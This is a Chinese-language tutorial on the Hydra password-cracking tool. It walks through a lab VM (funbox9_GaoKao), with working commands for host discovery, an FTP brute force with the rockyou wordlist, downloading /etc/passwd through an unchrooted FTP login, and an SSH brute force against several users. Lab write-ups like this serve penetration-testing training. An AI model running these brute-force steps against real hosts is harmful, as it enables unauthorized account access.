Hydra(九头蛇海德拉)教程

Hydra 参数

hydra <参数> <IP地址> <服务名>

参数 案例 说明
-l -l root 登录账号
-L -L userName.txt 用户文件
-p -l 123456 登录密码
-P -P passwd.txt 密码文件
-e -e nsr n 空密码 s 用户名即密码 r 用户名和密码相反(如root的密码为toor)
-s -s 21 指定端口
-R -R 继续上一次的进度开始爆破
-t -t 10 设置线程数
-vV -vV 显示详细过程
-o -o flag.txt 将结果输出到文件
-u -u 循环用户,不循环密码

案例说明(funbox9_GaoKao)

hydra 暴力破解FTP文件服务

ftp 利用思路:

1.ftp是明文传输,可以去嗅探获取登录凭证,嗅探传输的文件,可以使用中间人攻击(如ARP欺骗)实时流量劫持进行嗅探

  1. 密码爆破

3.匿名访问

4.查找FTP应用有没有公开的漏洞

1.获取目标主机IP

arp-scan -l -I eth1

通过arp-scan 工具继续网络探索,找到目标主机

ftp 172.30.1.128

发现有个用户名为sky的我们可以尝试使用sky这个用户名进行爆破

cd /usr/share/wordlists/

找到我们kail自带的一个密码字典rockyou

我们发现是个gz格式的压缩文件需要解压
gunzip -k rockyou.txt.gz

-k 保留原文件

hydra -l sky -P /usr/share/wordlists/rockyou.txt ftp://172.30.1.28

对ftp服务进行爆破,我们发现sky用户的密码为thebest

ftp 172.30.1.128

尝试使用sky用户登录

pwd :查看当前目录

发现ftp没有做chroot隔离,这样我们就可以获取根目录下的所有文件,我们获取passwd文件进行下载

查看我们下载好的passwd文件

我们发现有其他用户的信息,我们可以尝试对其他用户进行ssh爆破

sarah,lucy,sky,root

对sarah,lucy,sky,root用户进行爆破
cat <<ETT>> userName.txt

当输入到ETT时结束,并把之前输入的内容显示并写入到userName.txt这个文件中

hydra -u -e nsr -L userName.txt -P /usr/share/wordlists/rockyou.txt -o flag.txt -t 10 ssh://172.30.1.128

--t 10 在进行ssh爆破时要把线程数降低改成10

相关推荐
写代码的学渣9 小时前
ubuntu 22.04 新装的系统 xshell 连不上
linux·运维·ubuntu
2501_941805939 小时前
深入解析现代多语言后端架构设计:Python、Java、C++与Go在高性能服务中的实践
运维
F***E2399 小时前
如何安装配置Goland并使用固定公网地址SSH远程连接本地服务器
运维·服务器·ssh
序属秋秋秋9 小时前
《Linux系统编程之进程环境》【环境变量】
linux·运维·服务器·c语言·c++·操作系统·系统编程
云边有个稻草人10 小时前
手机也能控 Linux?Cpolar+JuiceSSH 搞定内网远程
运维·服务器·cpolar
Altair123110 小时前
nginx的https的搭建
运维·网络·nginx·云计算
云计算练习生10 小时前
linux shell编程实战 10 Git工具详解与运维场景实战
linux·运维·git
Umi·10 小时前
iptables的源地址伪装
运维·服务器·网络
晨非辰10 小时前
C++ 波澜壮阔 40 年:从基础I/O到函数重载与引用的完整构建
运维·c++·人工智能·后端·python·深度学习·c++40周年
阿巴~阿巴~12 小时前
自定义协议设计与实践:从协议必要性到JSON流式处理
服务器·网络·网络协议·json·操作系统·自定义协议